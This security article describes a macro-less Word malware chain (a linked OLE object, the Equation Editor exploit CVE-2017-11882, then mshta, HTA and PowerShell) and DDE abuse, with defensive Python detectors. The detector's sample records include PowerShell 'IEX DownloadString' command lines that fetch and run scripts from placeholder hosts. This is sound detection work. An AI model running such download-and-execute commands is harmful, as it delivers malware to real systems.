Delaware, USA – February 16, 2018 – Attackers have adopted a macro-less technique that delivers malware to victims' systems without drawing the suspicion that macro-enabled attachments attract, and that gets past email gateways. Researchers at Trustwave discovered a spam campaign in which emails with attached Microsoft Word documents start a four-stage delivery chain. The attachment is a Word 2007 format (DOCX) document whose embedded OLE object is linked to a remote URL rather than stored inside the file, so opening the document downloads an RTF file and hands it to Word. That RTF file exploits CVE-2017-11882, a memory-corruption vulnerability in the Office Equation Editor (EQNEDT32.EXE); Microsoft patched it in November 2017 and removed the Equation Editor altogether in the January 2018 update. The exploit launches mshta.exe to run an HTA file fetched from the attacker's server, and the HTA in turn carries a PowerShell script that downloads and runs the final payload. The observed campaign spreads password-stealing malware, but it is only a matter of time before other attackers adopt the technique to deliver more advanced malware.
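The first stage of the chain can be checked statically, because a .docx is a zip of XML parts and an OLE object that is linked rather than embedded appears as an oleObject relationship with TargetMode="External" in a .rels part; its Target is the URL Word fetches when the document opens. The scanner below is an added example, not Trustwave's or SOC Prime's code: it builds two sample documents in memory (one with a linked OLE object pointing at a placeholder URL, one with an ordinary embedded object) and reports the linked one.

```python
"""Static check for externally linked OLE objects in a .docx package.

Added example, not code from Trustwave or SOC Prime. A linked (not embedded)
OLE object is a Relationship of type .../relationships/oleObject with
TargetMode="External"; its Target is what Word downloads on open. The two
sample documents below are constructed in memory; their URLs are placeholders.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
REMOTE_SCHEMES = {"http", "https", "ftp"}


def external_ole_links(docx_bytes: bytes) -> List[Dict[str, object]]:
    """Return one record per externally linked OLE object in the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):  # relationship parts only
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                # Embedded objects (no TargetMode, Target under word/embeddings/)
                # are stored in the zip and involve no download; skip them.
                if rel.get("Type") != OLE_REL or rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                scheme = urlparse(target).scheme.lower()
                findings.append({
                    "part": name,
                    "rel_id": rel.get("Id"),
                    "target": target,
                    # UNC paths (\\server\share) also reach out over the network
                    "remote": scheme in REMOTE_SCHEMES or target.startswith("\\\\"),
                })
    return findings


def is_suspicious(docx_bytes: bytes) -> bool:
    """A mailed attachment has no good reason to load OLE content from elsewhere."""
    return bool(external_ole_links(docx_bytes))


def build_docx(rels_xml: str) -> bytes:
    """Construct a minimal package with the given document relationships (fixture)."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>Invoice</w:t></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed: the OLE object points at a remote RTF, as in the campaign above.
LINKED_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>'
    f'<Relationship Id="rId5" Type="{OLE_REL}" '
    'Target="http://stage2.example.invalid/doc.rtf" TargetMode="External"/>'
    "</Relationships>"
)
# Constructed: an ordinary embedded object stored inside the package.
EMBEDDED_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>'
    f'<Relationship Id="rId5" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>'
    "</Relationships>"
)

if __name__ == "__main__":
    for label, rels in (("linked", LINKED_RELS), ("embedded", EMBEDDED_RELS)):
        doc = build_docx(rels)
        print(label, "suspicious" if is_suspicious(doc) else "clean", external_ole_links(doc))
```

The check needs no Office installation and can run at the mail gateway; an external oleObject relationship in an inbound attachment is a strong signal on its own, and the recorded Target gives the URL to block before any user opens the file.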
Installing the Microsoft security updates protects the systems in your organization from this infection technique: with the Equation Editor patched or removed, the RTF stage fails and mshta.exe, the HTA and the PowerShell downloader never run. Another macro-less delivery technique is abuse of Dynamic Data Exchange (DDE) in MS Office. Although it is more involved to pull off, since the victim must click through the prompts Office shows before it launches the linked application, attackers continue to use it in spear-phishing campaigns. The DDE Exploitation Detector SIEM use case for ArcSight, QRadar and Splunk detects abuse of DDE in any MS Office application to deliver malware or to run PowerShell scripts.
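Both macro-less chains leave a distinctive process-creation trail that endpoint telemetry can catch regardless of the lure: the Equation Editor exploit makes EQNEDT32.EXE spawn a child (it is started through COM, so its own parent is svchost.exe, not Word), the HTA stage makes mshta.exe spawn PowerShell, and DDE makes the Office application itself spawn a command or script interpreter. The detector below is an added example, not SOC Prime's SIEM content or Trustwave's code; it runs those three rules over constructed Sysmon Event ID 1 style records (field names Image, ParentImage, CommandLine, ProcessId, ParentProcessId, Computer; the hosts, PIDs, paths and URLs are placeholders) and reconstructs the parent chain for each hit.

```python
"""Process-tree detections for the Equation Editor, HTA and DDE stages.

Added example, not SOC Prime's or Trustwave's code. Rules:
  1. EQNEDT32.EXE spawning any process (it has no reason to launch programs).
  2. An Office application spawning an interpreter: DDE abuse (also catches
     VBA macros doing the same).
  3. mshta.exe spawning PowerShell: the HTA-to-PowerShell stage.
Records are Sysmon-style and constructed inline; hosts, PIDs, paths and URLs
are placeholders.
"""
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
Event = Dict[str, str]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path: 'C:\\X\\Y.EXE' -> 'y.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Event) -> List[str]:
    """Names of the rules one process-creation event matches."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    hits = []
    if parent == "eqnedt32.exe":
        hits.append("equation_editor_child_process")
    if parent in OFFICE_APPS and child in INTERPRETERS:
        hits.append("office_spawns_interpreter")
    if parent == "mshta.exe" and child in POWERSHELL:
        hits.append("mshta_spawns_powershell")
    return hits


def ancestry(events: List[Event], computer: str, process_id: str) -> List[str]:
    """Root-to-leaf image names, following ParentProcessId as far as the log allows."""
    by_pid = {(e["Computer"], e["ProcessId"]): e for e in events}  # PIDs are per host
    chain, seen, last = [], set(), None
    key = (computer, process_id)
    while key in by_pid and key not in seen:
        seen.add(key)
        last = by_pid[key]
        chain.append(_basename(last["Image"]))
        key = (computer, last["ParentProcessId"])
    if last is not None:  # oldest recorded process: its parent is known only by name
        chain.append(_basename(last["ParentImage"]))
    return chain[::-1]


def detect(events: List[Event]) -> List[Dict[str, object]]:
    """Run every rule over the event stream; one alert per (event, rule)."""
    alerts = []
    for e in events:
        for rule in classify(e):
            alerts.append({"rule": rule, "host": e["Computer"],
                           "chain": ancestry(events, e["Computer"], e["ProcessId"]),
                           "cmdline": e.get("CommandLine", "")})
    return alerts


# Constructed records: the Word/RTF/HTA chain on ws01, DDE abuse on ws02.
OFFICE15 = r"C:\Program Files (x86)\Microsoft Office\Office15"
OFFICE16 = r"C:\Program Files\Microsoft Office\Office16"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EVENTS: List[Event] = [
    {"Computer": "ws01", "ProcessId": "900", "ParentProcessId": "700",
     "Image": OFFICE15 + r"\WINWORD.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" C:\Users\a\Downloads\invoice.docx'},
    # Equation Editor is started through COM, so its parent is svchost.exe, not Word.
    {"Computer": "ws01", "ProcessId": "1200", "ParentProcessId": "800",
     "Image": EQNEDT, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'"EQNEDT32.EXE" -Embedding'},
    {"Computer": "ws01", "ProcessId": "1300", "ParentProcessId": "1200",
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": EQNEDT,
     "CommandLine": "mshta http://stage3.example.invalid/a.hta"},
    {"Computer": "ws01", "ProcessId": "1400", "ParentProcessId": "1300",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -nop -ep bypass -c IEX (New-Object "
                    "Net.WebClient).DownloadString('http://stage4.example.invalid/p.ps1')"},
    # DDE: Word launches cmd.exe directly.
    {"Computer": "ws02", "ProcessId": "2100", "ParentProcessId": "2000",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": OFFICE16 + r"\WINWORD.EXE",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c IEX (New-Object "
                    "Net.WebClient).DownloadString('http://dde.example.invalid/s.ps1')"},
    # Benign: Word's 64-bit print spooler helper, a legitimate child of Word.
    {"Computer": "ws02", "ProcessId": "2200", "ParentProcessId": "2000",
     "Image": r"C:\Windows\splwow64.exe", "ParentImage": OFFICE16 + r"\WINWORD.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a['host']}: {a['rule']}  {' > '.join(a['chain'])}\n    {a['cmdline']}")
```

Rule 1 is the cheapest to deploy and the hardest for an attacker to avoid, because any payload launched through the Equation Editor bug has EQNEDT32.EXE as its parent; rule 2 needs an allow-list of legitimate Office children (the splwow64.exe record above is kept out by design) but covers DDE and macro launches alike.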